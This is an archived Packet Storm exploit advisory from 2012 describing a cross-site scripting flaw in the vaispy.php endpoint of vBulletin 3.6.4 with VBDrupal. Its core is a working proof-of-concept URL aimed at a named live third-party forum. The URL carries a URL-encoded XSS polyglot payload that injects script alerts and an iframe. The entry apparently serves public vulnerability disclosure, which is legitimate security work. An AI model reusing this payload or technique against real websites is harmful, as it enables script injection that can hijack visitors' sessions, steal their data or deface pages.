VBDrupal Cross Site Scripting

2012-01-07T00:00:00
ID PACKETSTORM:108433
Type packetstorm
Reporter Sony
Modified 2012-01-07T00:00:00

Description

                                        
                                            `# Exploit Title: VBDrupal Cross Site Scripting  
# Date: 6.01.2012  
# Author: Sony  
# Software Link: http://drupal.org/download  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/01/vbdrupal-cross-site-scripting.html  
..................................................................  
  
I found this only in the http://forums.techarena.in. This is Vbulletin  
3.6.4 with VBDrupal.  
  
We can see xss in the /vaispy.php?do=  
  
I replace xml with php.  
  
GET  
/vaispy.php?do=xml&last=5538926&r=0.73766774241121&forumids=&noChildren=0&_=  
  
/vaispy.php?do=xml = /vaispy.php?do=php  
  
Resultat:  
  
  
http://forums.techarena.in/vaispy.php?do=php&last=5538926&r=0.73766774241121&forumids=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/FK9D6DfRtgk%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E  
  
Greetz : AltaiR from hackzona.ru  
`